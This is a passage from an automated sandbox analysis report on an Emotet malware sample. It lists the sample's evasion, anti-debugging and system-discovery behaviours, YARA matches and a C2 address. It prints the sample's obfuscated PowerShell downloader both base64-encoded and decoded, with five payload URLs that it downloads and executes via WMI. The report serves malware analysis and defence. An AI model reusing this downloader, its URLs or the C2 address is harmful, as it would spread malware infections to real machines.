Source: C:\Users\user\633.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep | graph_3-38277
Found large amount of non-executed APIs
Source: C:\Users\user\633.exe | API coverage: 6.7 %
Source: C:\Windows\System32\inettimeout.exe | API coverage: 9.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2136 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\633.exe TID: 2324 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\633.exe TID: 2324 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\inettimeout.exe TID: 2144 | Thread sleep time: -60000s >= -30000s
Checks the free space of harddrives
Source: C:\Users\user\633.exe | File Volume queried: C:\ FullSizeInformation
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\633.exe | Code function: 3_2_0042A28A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_0042A28A
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Program exit points
Source: C:\Users\user\633.exe | API call chain: ExitProcess graph end node | graph_3-38388
Source: C:\Users\user\633.exe | API call chain: ExitProcess graph end node | graph_4-4525
Source: C:\Windows\System32\inettimeout.exe | API call chain: ExitProcess graph end node | graph_5-4563
Source: C:\Windows\System32\inettimeout.exe | API call chain: ExitProcess graph end node | graph_6-4510
Source: C:\Windows\System32\inettimeout.exe | API call chain: ExitProcess graph end node | graph_6-4520
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\633.exe | Code function: 3_2_0042E4E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0042E4E6
Contains functionality to dynamically determine API calls
Source: C:\Users\user\633.exe | Code function: 3_2_00418120 GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_00418120
Contains functionality to read the PEB
Source: C:\Users\user\633.exe | Code function: 3_2_00416BA0 mov eax, dword ptr fs:[00000030h] 3_2_00416BA0
Source: C:\Users\user\633.exe | Code function: 3_2_00240467 mov eax, dword ptr fs:[00000030h] 3_2_00240467
Source: C:\Users\user\633.exe | Code function: 3_2_00241743 mov eax, dword ptr fs:[00000030h] 3_2_00241743
Source: C:\Users\user\633.exe | Code function: 3_2_00240C0C mov eax, dword ptr fs:[00000030h] 3_2_00240C0C
Source: C:\Users\user\633.exe | Code function: 3_2_002612CD mov eax, dword ptr fs:[00000030h] 3_2_002612CD
Source: C:\Users\user\633.exe | Code function: 3_2_00261E04 mov eax, dword ptr fs:[00000030h] 3_2_00261E04
Source: C:\Users\user\633.exe | Code function: 4_2_003B0C0C mov eax, dword ptr fs:[00000030h] 4_2_003B0C0C
Source: C:\Users\user\633.exe | Code function: 4_2_003B0467 mov eax, dword ptr fs:[00000030h] 4_2_003B0467
Source: C:\Users\user\633.exe | Code function: 4_2_003B1743 mov eax, dword ptr fs:[00000030h] 4_2_003B1743
Source: C:\Users\user\633.exe | Code function: 4_2_003D1E04 mov eax, dword ptr fs:[00000030h] 4_2_003D1E04
Source: C:\Users\user\633.exe | Code function: 4_2_003D12CD mov eax, dword ptr fs:[00000030h] 4_2_003D12CD
Source: C:\Windows\System32\inettimeout.exe | Code function: 5_2_005B0467 mov eax, dword ptr fs:[00000030h] 5_2_005B0467
Source: C:\Windows\System32\inettimeout.exe | Code function: 5_2_005B0C0C mov eax, dword ptr fs:[00000030h] 5_2_005B0C0C
Source: C:\Windows\System32\inettimeout.exe | Code function: 5_2_005B1743 mov eax, dword ptr fs:[00000030h] 5_2_005B1743
Source: C:\Windows\System32\inettimeout.exe | Code function: 5_2_005D1E04 mov eax, dword ptr fs:[00000030h] 5_2_005D1E04
Source: C:\Windows\System32\inettimeout.exe | Code function: 5_2_005D12CD mov eax, dword ptr fs:[00000030h] 5_2_005D12CD
Source: C:\Windows\System32\inettimeout.exe | Code function: 6_2_00200C0C mov eax, dword ptr fs:[00000030h] 6_2_00200C0C
Source: C:\Windows\System32\inettimeout.exe | Code function: 6_2_00200467 mov eax, dword ptr fs:[00000030h] 6_2_00200467
Source: C:\Windows\System32\inettimeout.exe | Code function: 6_2_00201743 mov eax, dword ptr fs:[00000030h] 6_2_00201743
Source: C:\Windows\System32\inettimeout.exe | Code function: 6_2_003B1E04 mov eax, dword ptr fs:[00000030h] 6_2_003B1E04
Source: C:\Windows\System32\inettimeout.exe | Code function: 6_2_003B12CD mov eax, dword ptr fs:[00000030h] 6_2_003B12CD
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\633.exe | Code function: 3_2_0042FD49 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,3_2_0042FD49
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\633.exe | Code function: 3_2_0043850D SetUnhandledExceptionFilter,__encode_pointer,3_2_0043850D
Source: C:\Users\user\633.exe | Code function: 3_2_0042E4E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0042E4E6
Source: C:\Users\user\633.exe | Code function: 3_2_0043852F __decode_pointer,SetUnhandledExceptionFilter,3_2_0043852F
Source: C:\Users\user\633.exe | Code function: 3_2_0043501E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043501E
Source: C:\Users\user\633.exe | Code function: 3_2_0042D316 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0042D316

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknown | Process created: Base64 decoded $Wapxpfok='Tkxuccbust';$Itacnulq = '633';$Cactbhkkupc='Nmvzutsbixwf';$Dvdjlfjeq=$env:userprofile+'\'+$Itacnulq+'.exe';$Sqxrndmnwn='Dmayuunhppz';$Buglztfdh=.('new-obj'+'e'+'ct') nET.WeBcLIENt;$Dxyglgycuk='https://luislar68.000webhostapp.com/wp-admin/6xr5u-1xog-29595/*http://khomaynhomnhua.vn/dup-installer/tyl31xi-nmfh-643542/*https://fa.khanneshinhotel.ir/wp-content/4t1l-arjubdm39c-2426433731/*http://littlegreenwheel.com/wp-admin/20pav0-957-1402700868/*https://rawdahtrust.org/rprlq/sxttm-hugpwh1-171/'."S`plit"([char]42);$Waludfnbwruwx='Iaphnhqf';foreach($Jvteufwl in $Dxyglgycuk){try{$Buglztfdh."DOwNl`Oa`df`ile"($Jvteufwl, $Dvdjlfjeq);$Dbssvcqesq='Tthylhvg';If ((.('Get-'+'It'+'em') $Dvdjlfjeq)."lEn`GTH" -ge 21645) {([wmiclass]'win32_Process')."c`RE`AtE"($Dvdjlfjeq);$Jyparfrgu='Aevibodsfy';break;$Gvzpwjkuh='Iufczzbkhqit'}}catch{}}$Cfgcjrhi='Espvxjpdt'
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\633.exe | Process created: C:\Users\user\633.exe --4bc37bca
Source: C:\Windows\System32\inettimeout.exe | Process created: C:\Windows\System32\inettimeout.exe --597fd3a1
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERsheLL -e JABXAGEAcAB4AHAAZgBvAGsAPQAnAFQAawB4AHUAYwBjAGIAdQBzAHQAJwA7ACQASQB0AGEAYwBuAHUAbABxACAAPQAgACcANgAzADMAJwA7ACQAQwBhAGMAdABiAGgAawBrAHUAcABjAD0AJwBOAG0AdgB6AHUAdABzAGIAaQB4AHcAZgAnADsAJABEAHYAZABqAGwAZgBqAGUAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQASQB0AGEAYwBuAHUAbABxACsAJwAuAGUAeABlACcAOwAkAFMAcQB4AHIAbgBkAG0AbgB3AG4APQAnAEQAbQBhAHkAdQB1AG4AaABwAHAAegAnADsAJABCAHUAZwBsAHoAdABmAGQAaAA9AC4AKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAFQALgBXAGUAQgBjAEwASQBFAE4AdAA7ACQARAB4AHkAZwBsAGcAeQBjAHUAawA9ACcAaAB0AHQAcABzADoALwAvAGwAdQBpAHMAbABhAHIANgA4AC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANgB4AHIANQB1AC0AMQB4AG8AZwAtADIAOQA1ADkANQAvACoAaAB0AHQAcAA6AC8ALwBrAGgAbwBtAGEAeQBuAGgAbwBtAG4AaAB1AGEALgB2AG4ALwBkAHUAcAAtAGkAbgBzAHQAYQBsAGwAZQByAC8AdAB5AGwAMwAxAHgAaQAtAG4AbQBmAGgALQA2ADQAMwA1ADQAMgAvACoAaAB0AHQAcABzADoALwAvAGYAYQAuAGsAaABhAG4AbgBlAHMAaABpAG4AaABvAHQAZQBsAC4AaQByAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADQAdAAxAGwALQBhAHIAagB1AGIAZABtADMAOQBjAC0AMgA0ADIANgA0ADMAMwA3ADMAMQAvACoAaAB0AHQAcAA6AC8ALwBsAGkAdAB0AGwAZQBnAHIAZQBlAG4AdwBoAGUAZQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAyADAAcABhAHYAMAAtADkANQA3AC0AMQA0ADAAMgA3ADAAMAA4ADYAOAAvACoAaAB0AHQAcABzADoALwAvAHIAYQB3AGQAYQBoAHQAcgB1AHMAdAAuAG8AcgBnAC8AcgBwAHIAbABxAC8AcwB4AHQAdABtAC0AaAB1AGcAcAB3AGgAMQAtADEANwAxAC8AJwAuACIAUwBgAHAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXAGEAbAB1AGQAZgBuAGIAdwByAHUAdwB4AD0AJwBJAGEAcABoAG4AaABxAGYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEoAdgB0AGUAdQBmAHcAbAAgAGkAbgAgACQARAB4AHkAZwBsAGcAeQBjAHUAawApAHsAdAByAHkAewAkAEIAdQBnAGwAegB0AGYAZABoAC4AIgBEAE8AdwBOAGwAYABPAGEAYABkAGYAYABpAGwAZQAiACgAJABKAHYAdABlAHUAZgB3AGwALAAgACQARAB2AGQAagBsAGYAagBlAHEAKQA7ACQARABiAHMAcwB2AGMAcQBlAHMAcQA9ACcAVAB0AGgAeQBsAGgAdgBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQARAB2AGQAagBsAGYAagBlAHEAKQAuACIAbABFAG4AYABHAFQASAAiACAA
LQBnAGUAIAAyADEANgA0ADUAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAEUAYABBAHQARQAiACgAJABEAHYAZABqAGwAZgBqAGUAcQApADsAJABKAHkAcABhAHIAZgByAGcAdQA9ACcAQQBlAHYAaQBiAG8AZABzAGYAeQAnADsAYgByAGUAYQBrADsAJABHAHYAegBwAHcAagBrAHUAaAA9ACcASQB1AGYAYwB6AHoAYgBrAGgAcQBpAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBmAGcAYwBqAHIAaABpAD0AJwBFAHMAcAB2AHgAagBwAGQAdAAnAA==

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)
Source: C:\Users\user\633.exe | Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_00426F3D
Source: C:\Users\user\633.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_004418E2
Source: C:\Users\user\633.exe | Code function: GetLocaleInfoA,3_2_0043DA95
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\633.exe | Code function: 3_2_0043C94B cpuid 3_2_0043C94B
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\633.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\inettimeout.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\633.exe | Code function: 3_2_0042E9F5 GetSystemTimeAsFileTime,__aulldiv,3_2_0042E9F5
Contains functionality to query time zone information
Source: C:\Users\user\633.exe | Code function: 3_2_0043615F __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_0043615F
Contains functionality to query windows version
Source: C:\Users\user\633.exe | Code function: 3_2_00404050 GetVersionExA,SystemParametersInfoA,RegOpenKeyExA,RegQueryValueExA,_strtoul,RegCloseKey,3_2_00404050
Queries the cryptographic machine GUID
Source: C:\Users\user\633.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match | File source: 00000004.00000002.1111713947.003D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1111686165.003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1110806927.005D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1077077349.00261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1077030362.00240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1264863490.003B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1110775932.005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1264701291.00200000.00000040.00000001.sdmp, type: MEMORY

Malware Configuration

Threatname: Emotet

{"C2 list": ["42.115.22.145/jHnnLdTLu1NRMhU"]}

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet